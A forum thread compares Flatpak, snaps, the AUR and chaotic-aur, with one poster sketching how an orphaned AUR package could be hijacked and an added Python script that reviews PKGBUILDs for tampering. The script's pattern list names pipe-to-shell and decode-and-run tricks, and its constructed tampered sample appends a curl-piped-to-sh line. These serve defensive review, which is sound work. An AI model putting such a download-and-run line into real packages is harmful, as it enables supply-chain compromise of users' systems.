Current Best Practice: Flatpak or AUR?

Maybe. I only use two Flatpak apps on my machines, the rest from the AUR. Someone suggested those two here on this forum.

In the meantime, I have come to change my view on this. I have generally given up on snap packages and now use
chaotic-aur as a complement to the community packages; Flatpak
is then a last resort.
What I did not like about the AUR were the long build and update runs. But since chaotic-aur
came along I can mostly avoid resorting to Flatpak.

AUR. The only flatpak I use is steam - because (at least in my head) it’s containerized in a way that makes it more stable because it’s one collective cohesive package not associated with anything else.

For me, the main advantage of flatpak over an AUR package is that if it’s installed per user, and /home is a separate partition, then you can reinstall the OS and your flatpaks will be available right away. On a multi-system, multi-distro network, flatpaks would also be an easy way to guarantee the same software versions.

That’s a bad idea, in my opinion. chaotic-aur automates the building of AUR packages. This is bad, because of the absence of human oversight, something AUR was never designed for.

If I were a malicious person, this is how I would attempt to spread my malware:

  1. I would gather some statistics on when chaotic-aur builds packages from the AUR.
  2. I would try to take over a reasonably popular package on the AUR (something that’s been orphaned), and upload a malicious PKGBUILD to the AUR just before it is built in the chaotic-aur.
  3. Profit.

Of course, some details would have to be worked out, it certainly wouldn’t be this simple, but this is the general idea.

The automatic package building process wouldn’t notice a malicious PKGBUILD (whereas users who manually try to build the package probably would). Even after the PKGBUILD was taken off the AUR (which would happen fairly quickly), it might still remain in the chaotic-aur as a built package. It only needs to be run once as root, and I’d have complete control over many computers.


OK, that is a heavy chunk of information to digest that I was not aware of.
Thanks for your input…
@Kresimir, if I follow your line of thought, will there also be a trace of uncertainty in
tracking the contents of snap and Flatpak packages in the end?

I think that @dalto mentioned this, but this is 100% false.

Some of the original maintainers maintain their Flatpak (and some AUR packages too), but a huge chunk of the software on there is done by users, similar to the AUR.

The one advantage I would say Flatpak really has is that the containerization tends to make the situation a bit better. I also frequently have much better luck running Flatpaks of certain software than the AUR versions.

One example is Natron: most of the time it doesn’t even build from the AUR, but the Flatpak just works.

It does not, if the packager is either malicious or incompetent (the two main concerns when it comes to installing software). It merely gives the user a false sense of security.

The biggest advantage of the AUR is that you build the packages yourself (according to a recipe posted by someone online), so you can know exactly what goes in the package, assuming you care to know. If you don’t care to know, then this advantage of the AUR is completely lost to you.

With Flatpaks and AppImages, you have no idea what is packaged in them – you trust the packager.

With snaps, there is no uncertainty: snapd itself is malware, so even if individual snaps are safe (which may not be the case, there have certainly been cases of malware hidden in snap packages), the utility that installs, updates, and runs them, snapd, is not safe.

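The manual review step that the earlier post says an automated builder skips, and the "you build it yourself, so you can know what goes in" point made just above, as an added example. This is my code, not anything from the thread, chaotic-aur, makepkg or any AUR helper; the package, the URLs and both PKGBUILD texts are constructed for the example, and the pattern list is a heuristic, not a complete policy. It reviews the PKGBUILD about to be built (checksums present and not SKIP, no pipe-to-shell or decode-and-run constructs, no setuid bits or writes outside `$pkgdir`) and prints the diff against the last version a human approved, which is exactly the information an unattended pipeline throws away.

```python
"""Review an AUR PKGBUILD before building it (added example, not project code).

Checks: every source has a real checksum (not SKIP), the recipe contains no
pipe-to-shell / decode-and-run / privilege tricks, and a unified diff is
produced against the last PKGBUILD a human approved.
"""
import difflib
import re

# Constructs a reviewer would stop on. Constructed heuristic list, not exhaustive.
SUSPICIOUS = [
    (r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba)?sh\b", "pipe-to-shell"),
    (r"base64\s+(-d|--decode)\b", "base64 decode at build time"),
    (r"\beval\b", "eval"),
    (r"\bsudo\b", "sudo inside PKGBUILD"),
    (r"(chmod\s+([ugoa]*\+s|0?[2-7][0-7]{3})|install\b[^\n]*-[A-Za-z]*m0?[2-7][0-7]{3})\b",
     "setuid/setgid bit"),
    (r"(?<![\w\"}])/(etc|usr|root|home)/", "absolute path outside $pkgdir"),
    (r"https?://[^\s'\"]+\.(sh|py)\b", "remote script URL"),
]

ARRAY_RE = r"^{name}(?:_\w+)?=\((.*?)\)"  # bash array assignment, may span lines


def _array(text, name):
    """Return the elements of an array assignment such as source=(...)."""
    m = re.search(ARRAY_RE.format(name=name), text, re.S | re.M)
    return [tok.strip("'\"") for tok in m.group(1).split()] if m else []


def check_sources(text):
    """Every source entry needs a checksum, and none of them may be SKIP."""
    findings = []
    sources = _array(text, "source")
    sums = _array(text, r"(?:md5|sha1|sha256|sha512|b2)sums")
    if sources and not sums:
        findings.append("no checksum array for sources")
    elif len(sums) != len(sources):
        findings.append(f"{len(sources)} sources but {len(sums)} checksums")
    for src, chk in zip(sources, sums):
        if chk.upper() == "SKIP":
            findings.append(f"checksum SKIP for {src}")
        url = src.split("::", 1)[1] if "::" in src else src  # name::url form
        if url.startswith("http://"):
            findings.append(f"plain-http source {url}")
    return findings


def check_shell(text):
    """Scan every non-comment line (functions included) for risky constructs."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        for pat, why in SUSPICIOUS:
            if re.search(pat, line):
                findings.append(f"line {lineno}: {why}: {line.strip()}")
    return findings


def review(previous, current):
    """Findings for the new PKGBUILD plus the diff a human should read first."""
    diff = list(difflib.unified_diff(previous.splitlines(), current.splitlines(),
                                     "PKGBUILD.reviewed", "PKGBUILD.new", lineterm=""))
    return {"findings": check_sources(current) + check_shell(current), "diff": diff}


# Constructed sample: the last PKGBUILD a human looked at (hypothetical package).
CLEAN = """\
pkgname=hello-aur
pkgver=1.2.0
pkgrel=1
arch=('x86_64')
url="https://example.org/hello"
source=("$url/hello-$pkgver.tar.gz")
sha256sums=('9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08')
build() {
  make -C "hello-$pkgver"
}
package() {
  make -C "hello-$pkgver" DESTDIR="$pkgdir" install
}
"""

# The takeover scenario from the thread, constructed: pkgrel bumped, checksum
# replaced by SKIP, and a download-and-run line appended to package().
TAMPERED = CLEAN.replace("pkgrel=1", "pkgrel=2")
TAMPERED = re.sub(r"sha256sums=\(.*\)", "sha256sums=('SKIP')", TAMPERED)
TAMPERED = TAMPERED.replace(
    '  make -C "hello-$pkgver" DESTDIR="$pkgdir" install\n',
    '  make -C "hello-$pkgver" DESTDIR="$pkgdir" install\n'
    '  curl -fsSL https://example.org/hello/post-install.sh | sh\n')

if __name__ == "__main__":
    result = review(CLEAN, TAMPERED)
    print("\n".join(result["diff"]))
    for finding in result["findings"]:
        print("REVIEW:", finding)
```

Run against a real package by feeding it the PKGBUILD you last approved and the one `makepkg` is about to execute; an empty diff and no findings is the only case in which an unattended build is defensible, and even then the check only covers the recipe, not the upstream tarball it fetches.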

I have come to a conclusion: I dropped snap, Flatpak and chaotic-aur, not because
I think there is an immediate threat, but just because of the possibility of one.
Otherwise, it creates an uncertain situation that one would know from
using Windows, and I know no one would want that.

While EndeavourOS is a really great distro, my main system, RebornOS, has
immense coverage, so there is no need for additional sources. And this
is a kind of solution for this thread’s topic in the end, namely
to minimize the need for external sources.
Should I encounter such a situation, I would resort to the AUR.

So I am good for now and happy to have Linux around. Thanks
also for this great community here,
which I am happy to belong to; this cannot be appreciated enough.


No snaps …no flatpak… I’m an AUR person! :laughing:


Bit late to the thread, but here is my take.
1) use the AUR for anything system-related
2) use Flatpak for any applications that aren’t in the system repository

As a rule it’s best to minimise use of the AUR.


Late commenter as well, but here’s my situation.

In the previous install I used the AUR whenever something was available from there. It worked most of the time. Before reinstalling, however, I had a fair number of problems with some of the packages. chatty would not compile for the last 2 months (goodbye Twitch chat), and intermittently some other packages I wanted to test had errors in the compilation process. And it seems that although I chose to “Remove build tools after installing” (paraphrasing), when a build process aborts because of an error it leaves the build tools installed, so with every broken build process I got more and more dependencies that I needed to clean up.

In this install, I am trying to go for Flatpaks (current number of applications is 5) whenever I have the choice. I am currently seeing the first disadvantages of that solution. In the end I hope to make an informed decision on how to proceed in the future.

Before I switched back to Arch I was running Fedora, and it was then that I decided to run all proprietary applications and applications that require 32-bit libraries as Flatpaks. I then switched to EndeavourOS and then Arch; after a discussion I created about Flatpaks and AppImages, I decided that since I am on Arch I might as well just use the AUR for anything not in the default repos. I currently only use Flatpaks for applications that require 32-bit libraries, which are Steam and Lutris.

Why? There are 32-bit libraries in the multilib repo.

I know that, I just dislike having to install a bunch of 32-bit libraries on my system just for two applications while the rest of my system is all 64-bit applications, so I would rather run those as Flatpaks.

But why? You still have all those libraries bundled up in the Flatpak.

In each Flatpak, that is. So this way, you have about twice as much storage devoted to 32-bit libraries, since both Flatpaks contain some of the same libraries.


Because then I don’t see them in my package output, since they are in a container. It’s just a personal thing/preference, like how some people prefer a certain desktop environment or window manager over another.

My two Flatpaks take about 4.7G of storage. I have a 2T SSD for my desktop (with 1.1T free) and I have a NAS with 16T of storage where I keep my personal files and other files, so I couldn’t care less about the tiny amount of extra space those two Flatpaks take up. :slightly_smiling_face:

Yeah, but we are talking about best practices, not subjective personal preferences. But okay, it’s your computer, I can only say that in your place, I wouldn’t do it like that. :man_shrugging:


Using something other than the default package manager to install software is not bad practice; bad practice would be logging into the graphical environment with the root account.

It may or may not be bad, but it’s certainly not best.